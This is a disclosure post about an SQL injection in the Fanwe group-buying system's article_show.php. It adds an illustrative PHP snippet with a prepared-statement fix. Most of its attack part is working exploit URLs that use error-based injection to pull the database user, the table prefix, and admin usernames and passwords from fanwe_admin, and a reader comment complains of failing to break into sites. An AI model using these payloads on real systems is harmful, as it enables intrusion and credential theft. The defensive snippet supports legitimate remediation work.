Fanwe (方维) group-buying system SQL injection: affects every version up to the latest 4.2

This group-buying system used to be free; I am not sure why, but it seems to have started charging now.
This vulnerability has also been present all along in several lower versions!
Vulnerable file: app/source/article_show.php
[php]
if ($_REQUEST ['m'] == 'Article' && $_REQUEST ['a'] == 'showByUname') {
    $uname = $_REQUEST['uname']; // no filtering
    if ($uname != '')
    {
        $uname = rawurldecode($uname); // not affected by GPC (magic_quotes)

        .......... code below omitted
[/php]
Such an obvious injection, and it has survived N versions...
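Added example (not Fanwe's code) showing why the rawurldecode() call above undoes what magic_quotes_gpc would have done, beside a bound-parameter version of the lookup. The PDO handle $pdo and the table/column fanwe_user.user_name are assumed placeholder names.

```php
<?php
// Added example, not from the Fanwe code base. Assumes a PDO handle $pdo and
// a placeholder table fanwe_user with a user_name column.

// Mirrors the post's pattern: PHP has already decoded the query string once
// into $_REQUEST, GPC (if enabled) has escaped any quotes, and then
// rawurldecode() decodes a second time before the value is put into SQL.
function vulnerable_sql(string $request_uname): string {
    $uname = rawurldecode($request_uname);   // no filtering, second decode
    return "SELECT * FROM fanwe_user WHERE user_name='$uname'";
}

// Hardened form: decode, allow-list the expected shape, then bind the value.
function safe_lookup(PDO $pdo, string $request_uname): ?array {
    $uname = rawurldecode($request_uname);
    // Allow-list is an assumption; adjust to the real user-name rules.
    if (!preg_match('/^[\p{L}\p{N}_.-]{1,32}$/u', $uname)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM fanwe_user WHERE user_name = :uname');
    $stmt->execute([':uname' => $uname]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Walk a constructed double-encoded value through the same stages PHP would.
$on_the_wire = "%2527%20or%201%3D1%2523";   // constructed: what the URL carries
$in_request  = rawurldecode($on_the_wire);   // simulates PHP's own decode -> "%27 or 1=1%23"
$after_gpc   = addslashes($in_request);      // simulates magic_quotes: no quote yet, unchanged
echo vulnerable_sql($after_gpc), "\n";
// -> SELECT * FROM fanwe_user WHERE user_name='' or 1=1#'   (quote reaches SQL)

// A single-encoded %27 is caught by GPC: the backslash survives rawurldecode().
echo vulnerable_sql(addslashes(rawurldecode("%27"))), "\n";
// -> SELECT * FROM fanwe_user WHERE user_name='\''
```

magic_quotes_gpc was removed in PHP 5.4, so on newer PHP the single-encoded form reaches the query unescaped as well; the prepared statement is what actually closes the hole.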

There is also a path-disclosure vulnerability: mapi/comm.php

exp:
[php]
http://0day5.com//index.php?m=Article&a=showByUname&uname=%2527or%201=%28select%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28select%20user%28%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%2523
[/php]

Get the first table, mainly to learn the prefix
[php]
http://0day5.com//index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28select%20table_name%20from+information_schema.columns+where+table_schema%3Ddatabase%28%29%20limit%200%2C1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
[/php]

Get the account
[php]
http://0day5.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28select%20adm_name%20from%20fanwe_admin%20limit%200%2C1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
[/php]

Get the password; it has to be cut with substr here, I don't know why either
[php]
http://0day5.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28SELECT%20substr%28%28select%20adm_pwd%20from%20fanwe_admin%20where%20status%3D1%20limit%200%2C1%29%2C9%2C16%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
[/php]

exp:
[php]
http://0day5.com/index.php?m=Article&a=showByUname&uname=%27or%201=(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20SUBSTRING(CONCAT(adm_name,0x7c,adm_pwd,0x7c),1,60)%20FROM%20fanwe_admin%20LIMIT%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23
[/php]

1 comment

  1. 123

    Can't get a single site. Annoying.
